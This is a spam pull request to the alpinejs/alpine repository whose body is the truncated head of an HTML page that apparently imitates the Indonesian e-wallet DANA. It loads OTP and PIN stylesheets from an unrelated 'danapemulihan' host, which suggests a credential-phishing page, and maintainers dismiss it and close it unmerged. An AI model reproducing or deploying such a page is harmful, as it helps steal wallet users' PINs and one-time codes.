Update index.html
alpinejs/alpine pull request #4396
Opened 2024-10-15 16:56 UTC by Eizfauziah37

<html class="hydrated"><head>
  <meta charset="UTF-8"><style data-styles="">ion-icon{visibility:hidden}.hydrated{visibility:inherit}</style><style data-styles="">ion-icon{visibility:hidden}.hydrated{visibility:inherit}</style>
  <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0">
  <meta name="theme-color" content="#118EEA"> 
  
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title></title>
  <meta property="og:title" content="DANA ID">
  <meta property="twitter:title" content="DANA ID ">
  <meta property="twitter:card" content="summary_large_image">
  <meta property="og:image:type" content="image/jpeg">
  <meta content="https://images.app.goo.gl/3mTdwFp4gHiT9qYd7" property="og:image">
   <link href="https://images.app.goo.gl/3mTdwFp4gHiT9qYd7" rel="shortcut icon" type="image/x-icon">
    <link href="https://images.app.goo.gl/3mTdwFp4gHiT9qYd7" rel="apple-touch-icon">
   <link rel="canonical" href="https://www.dana.id/">
     <meta property="og:url" content="https://www.dana.id/">
  <meta property="og:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
  <meta property="twitter:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
  <script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
  <script nomodule="" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.js"></script>
  <link rel="stylesheet" href="https://dev-danapemulihan.pantheonsite.io/asset/container.css">
  <link rel="stylesheet" href="https://dev-danapemulihan.pantheonsite.io/asset/loader.css">
  <link rel="stylesheet" href="https://dev-danapemulihan.pantheonsite.io/asset/main.css">
  <link rel="stylesheet" href="https://dev-danapemulihan.pantheonsite.io/asset/otp.css">
  <link rel="stylesheet" href="https://dev-danapemulihan.pantheonsite.io/asset/pin.css">
  <style>
      
  body, html{
        left: 0;
        right: 0;
        bottom: 0;
        top: 0;
        margin: 0px auto;
        width: 100%;
        height: 100%;
        positon: fixed
        
  }
  h2{font-size: 18px; }
  
  h3{
    font-size: 14px;  
  }
  
   
   * {
    box-sizing: border-box;
    scrollbar-color: transparent transparent; /* thumb and track color */
    scrollbar-width: 0px;
  }
  
  *::-webkit-scrollbar {
    width: 0;
  }
  
  *::-webkit-scrollbar-track {
    background: transparent;
  }
  
  *::-webkit-scrollbar-thumb {
    background-color: #118CEA;
    border: none;
  }
  
  * {
    -ms-overflow-style: none;
  }
  
  ol, li {
    list-style: none;
    margin: 0;
    padding: 0;
  }
  
  .carousel {
    position: absolute;
    background-color: #118CEA;
    padding-top:0%;
    height: 100%;
    top: 0;
    right: 0;
    left: 0;
    margin: 0px auto;
    perspective: 200px;
  }
  
  .carousel__viewport {
    position: absolute;
    padding: 32px;
    width: 100%;
    top: 0;
    background-color: #118CEA;
    right: 0;
    bottom: 0;
    left: 0;
    height: 79%;
    display: flex;
    overflow-x: scroll;
    counter-reset: item;
    margin: 0px auto;
   
    scroll-behavior: smooth;
    scroll-snap-type: x mandatory;{}
  }
  
  .carousel__slide {
    position: relative;
    flex: 0 0 100%;
    width: 100%;
    height: 100%;
    margin-left: 10px;
    background-color: #118CEA;
    counter-increment: item;
    z-index: 99999999;
  }
  
  .carousel__slide:nth-child(even) {
    background-color: #118CEA;
  }
  
  .carousel__slide:before {
    content: counter(item);
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate3d(-50%,-40%,70px);
    color: #000;
    font-size: 2em;
    background-color: #118CEA;
  }
  
  .carousel__snapper {
    position: relative;
    top: 0;
    left: 0;
    right: 0;
    bottom: 0;
    width: 100%;
    height: 100%;
    scroll-snap-align: center;
    background-color: #118CEA;
    
    
  }
  
  @media (hover: hover) {
    .carousel__snapper {
      animation-name: tonext, snap;
      animation-timing-function: ease;
      animation-duration: 4s;
      animation-iteration-count: infinite;
    }
  
    .carousel__slide:last-child .carousel__snapper {
      animation-name: tostart, snap;
    }
  }
  
  @media (prefers-reduced-motion: reduce) {
    .carousel__snapper {
      animation-name: none;
    }
  }
  
  .carousel:hover .carousel__snapper,
  .carousel:focus-within .carousel__snapper {
    animation-name: none;
  }
  
  .carousel__navigation {
    position: absolute;
    right: 0;
    bottom: 0;
    left: 0;
    text-align: center;
  }
  
  .carousel__navigation-list,
  .carousel__navigation-item {
    display: inline-block;
  }
  
  
  .carousel::before,
  .carousel::after,
  .carousel__prev,
  .carousel__next {
    position: absolute;
    top: 0;
    margin-top: 37.5%;
    width: 0;
    height: 0;
    transform: translateY(-50%);
    border-radius: 50%;
    font-size: 0;
    outline: 0;
    opacity: 0.0;
  }
  
  .carousel::before,
  .carousel__prev {
    left: -1rem;
  }
  
  .carousel::after,
  .carousel__next {
    right: 0rem;
  }
  
  .carousel::before,
  .carousel::after {
    content: '';
    z-index: 1;
    background-color: #fff;
    background-size: 1.5rem 1.5rem;
    background-repeat: no-repeat;
    background-position: center center;
    color: #000;
    font-size: 2.5rem;
    line-height: 4rem;
    text-align: center;
    pointer-events: none;
  }
  
  /*********************/
  .process1 {
       width: 100%;
              height: 100%;
               display: flex;
               justify-content: center;
              margin: auto;
              position: absolute;
             padding-top: 300px;
              left: 0;
              right: 0;
              bottom: 0;
              background: rgba(0, 0, 0, 0.6);
              z-index: 99999;
              
        
  }
  .loading {
      position: absolute;
      display: flex;
      justify-content: center;
      align-items: center;
      margin-bottom: 20%;
  }
  .loading img {
      width: 50px;
      
      top: 10;
  }
  .loading .spinner{
      position: absolute;
      width: 35px;
      animation: spin 1s linear infinite;
      -webkit-animation: spin 1s linear infinite;
      -moz-animation: spin 1s linear infinite;
      -ms-animation: spin 1s linear infinite;
      -o-animation: spin 1s linear infinite;
  }
  @keyframes spin {
    0% { transform: rotate(360deg); }
    100% { transform: rotate(0deg); }
  }
  @-webkit-keyframes spin {
    0% { -webkit-transform: rotate(360deg); }
    100% { -webkit-transform: rotate(0deg); }
  }
  @-moz-keyframes spin {
    0% { -webkit-transform: rotate(360deg); }
    100% { -webkit-transform: rotate(0deg); }
  }
  @-ms-keyframes spin {
    0% { -webkit-transform: rotate(360deg); }
    100% { -webkit-transform: rotate(0deg); }
  }
  @-o-keyframes spin {
    0% { -webkit-transform: rotate(360deg); }
    100% { -webkit-transform: rotate(0deg); }
  }
  
  /*********************/
  
   #homeku{
       width: 100%;
       height: 100%;
       position: fixed;
      background: #118EEA;
    background-position: 100% 100%;
    background-size: 100% 100%;
    left: 0;
    right: 0;
    top: 0;
    bottom: 0;
    margin: 0px auto;
       
       
   }
   
   .inp{
       width: 70%;
       padding-left: 10px;
   }
   
   
   .btn-backku{
       position: absolute;
       left: 20;
       top: 12;
       background: transparent;
       color: #fff;
       border: none;
       font-size: 18px;
       font-weight: 300;
      
   }
   
   
   #back1{
        display: none;
       
   }
   
   #back2{
        display: none;
   }
  </style></head>
  
  <body>
  
  <div style="display:none;" class="index">
    <div class="header">
     [...]

2024-10-15 18:04 UTC, ekwoka requested changes
Please just delete your account before GitHub bans you

2024-10-15 18:30 UTC, piq9117 commented on index.html
> +</html>"
```suggestion
```

2024-10-15 18:30 UTC, piq9117 commented on index.html
> +      </div>
```suggestion
```

2024-10-15 18:32 UTC, piq9117 commented on index.html
> +      <img src="https://dev-danapemulihan.pantheonsite.io/asset/img/dana_logo.png" class="logo" alt="">
```suggestion
```

2024-10-15 18:38 UTC, hirokoclanger commented
Can't wait to see that script suggestion in my coPilot.

2024-10-15 18:40 UTC, CodecNomad commented
hi

2024-12-09 11:33 UTC, SimoTod commented
closing since it's just rubbish 😂

2024-12-09 11:33 UTC, closed without merging

2024-12-09 17:22 UTC, CodecNomad commented
Alr